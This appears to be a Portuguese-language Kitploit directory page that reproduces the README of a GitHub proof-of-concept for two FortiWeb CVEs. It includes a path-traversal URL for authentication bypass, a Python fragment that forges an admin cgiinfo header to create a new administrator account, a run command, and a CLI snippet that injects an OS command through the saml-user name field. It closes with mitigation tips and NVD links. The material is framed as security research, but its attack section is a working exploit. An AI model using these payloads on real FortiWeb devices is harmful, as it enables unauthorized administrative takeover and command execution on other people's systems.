Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FORTIWEB_CVE-2025-64446-58034 — Exploit PoC para CVEs do FortiWeb: bypass de autenticação via path traversal e injeção autenticada de comandos do SO. Inclui análise detalhada, payloads e orientações de mitigação para testes de segurança. | Kitploit
Ferramentas/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

Exploit PoC para CVEs do FortiWeb: bypass de autenticação via path traversal e injeção autenticada de comandos do SO. Inclui análise detalhada, payloads e orientações de mitigação para testes de segurança.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
4há 5 mesesAinda não revisado

Simulação de exploração do FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Nota:

  • Este documento é apenas para fins de estudo e pesquisa em segurança.
  • Não utilize para atacar sistemas sem autorização.

1. Visão geral

FortiWeb é um dispositivo de Firewall de Aplicação Web (WAF) usado para proteger aplicações web.

Em 2025, duas vulnerabilidades críticas foram descobertas:

  • CVE-2025-64446 – Bypass de autenticação via Path Traversal
  • CVE-2025-58034 – Injeção de comandos do SO

2. Visão geral do CVE-2025-64446

ItemConteúdo
Tipo de vulnerabilidadeRelative Path Traversal
Bypass de autenticação
CausaFortiWeb processa caminhos de forma incorreta antes da autenticação:

- Controle de acesso baseado em string de caminho lógico
- Não normaliza o caminho completo
- Permite o uso de ../ para acessar recursos internos
DescriçãoAlguns endpoints administrativos podem ser acessados sem autenticação válida
Impacto- Bypass total de autenticação
- Acesso não autorizado a funções de administrador
- Quebra do modelo de permissões
Versões afetadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Exemplo:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Visão geral do CVE-2025-58034


4. Processo de experimentação (POC)

4.1. Preparação do ambiente:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Isso ajuda a evitar conflitos de versão de bibliotecas, garantir a estabilidade do ambiente de trabalho e limitar o impacto no sistema

venv-git

4.2 Exploração

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Execute a ferramenta com Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: O endereço IP aqui é o nome do host do dispositivo FortiWeb.

exploit

Obtém-se username e password -> realiza login

login

connect

Exploração bem-sucedida e criada uma nova conta com privilégios de admin.

4.3 Exploração do CVE-2025-58034 após login na conta

Após fazer login com sucesso usando a nova conta de administrador criada, o atacante pode explorar a vulnerabilidade de injeção de comandos autenticada através de requisições especialmente criadas ou diretamente através da interface de linha de comando do FortiWeb CLI:

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

O FortiWeb sairá da string de configuração e executará o comando id durante o processo de configuração do saml-user.

5. Algumas formas de mitigação das vulnerabilidades

  • Atualizar o FortiWeb para a versão corrigida.
  • Limitar o acesso à interface de administração.
  • Não expor a interface de gerenciamento à Internet.
  • Verificar contas de administrador anormais.

6. Referências adicionais

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Baixar ferramenta
ItemConteúdo
Tipo de vulnerabilidadeOS Command Injection (CWE-78)
CausaFortiWeb processa entrada de forma insegura ao executar comandos do sistema:

- Sem validação de entrada
- Falta de escape de caracteres especiais
- Transmissão direta de dados do usuário para comandos do sistema
DescriçãoVulnerabilidade que requer autenticação mas permite injeção de comandos do sistema
Impacto- Execução não intencional de comandos
- Acesso a recursos do sistema
- Comprometimento da integridade e disponibilidade
Versões afetadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11